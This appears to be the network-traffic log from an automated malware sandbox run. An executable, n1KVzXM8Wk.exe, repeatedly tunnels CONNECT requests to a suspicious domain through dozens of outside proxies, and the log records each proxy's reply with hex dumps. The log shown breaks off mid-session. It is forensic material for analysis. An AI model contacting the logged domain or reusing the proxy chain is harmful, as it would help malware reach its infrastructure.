                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      662192.168.2.45206792.255.164.16641456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.566401958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      663192.168.2.452144212.110.188.198344056812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.572407961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.098624945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.443448067 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      664192.168.2.451029128.199.196.31146026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.574470997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.680833101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.865884066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.866075993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      665192.168.2.452018198.44.255.3806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.580313921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.211453915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.501055002 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.24.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      666192.168.2.451977102.212.86.3780806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.589185953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      667192.168.2.45200020.24.43.214806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.596486092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.922852039 CET319INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 17
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      X-Cache: MISS from cdn-fintech.info
                                                                                                      X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                      Data Ascii: ERR_ACCESS_DENIED


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      668192.168.2.452244178.128.157.1144436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.618433952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      669192.168.2.452249178.128.157.1144436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.620536089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      670192.168.2.452165184.178.172.25152916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.620944023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      671192.168.2.452251178.128.157.1144436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.622853041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      672192.168.2.452256178.128.157.1144436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.624555111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      673192.168.2.451346207.180.198.241351196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.628779888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.740567923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.834686041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.834757090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.834348917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:57.834480047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:09.904215097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      674192.168.2.45220045.196.150.22254326812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.631807089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.726418018 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Content-Length: 65
                                                                                                      Proxy-Authenticate: Basic realm="Proxy"
                                                                                                      Connection: close
                                                                                                      Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                                      Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      675192.168.2.45198360.161.246.3331286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.631808043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:00.850656033 CET536INHTTP/1.1 503 Service Unavailable
                                                                                                      Server: squid/3.5.20
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:46:00 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 3745
                                                                                                      X-Squid-Error: ERR_DNS_FAIL 0
                                                                                                      Vary: Accept-Language
                                                                                                      Content-Language: en
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      676192.168.2.451972218.57.210.18690026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.645370007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.037847996 CET311INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:27:55 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      677192.168.2.45219812.186.205.120806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.649912119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.783005953 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.14.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      678192.168.2.451351173.212.209.49367906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.653841972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.680881977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      679192.168.2.452070106.14.124.29816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.655103922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.993109941 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.18.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      680192.168.2.45210834.92.12.21092386812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.655616999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.651510000 CET28INHTTP/1.1 502 Bad Gateway


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      681192.168.2.45218672.206.181.12341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.682172060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      682192.168.2.45218798.162.25.2341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.682692051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      683192.168.2.451375115.74.153.410806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.683305025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      684192.168.2.45215193.126.56.3041536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.683509111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      685192.168.2.45215993.90.212.241536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.695103884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      686192.168.2.452150103.146.137.910816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.700948954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      687192.168.2.452234185.162.228.170806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.701011896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.788229942 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      688192.168.2.45222045.196.151.9354326812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.701775074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.799381018 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Content-Length: 65
                                                                                                      Proxy-Authenticate: Basic realm="Proxy"
                                                                                                      Connection: close
                                                                                                      Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                                      Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      689192.168.2.451450162.241.46.40622446812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.712460995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.740675926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.834678888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.834769011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      690192.168.2.452194146.59.2.185806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.712866068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      691192.168.2.45216094.20.183.172806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.713403940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
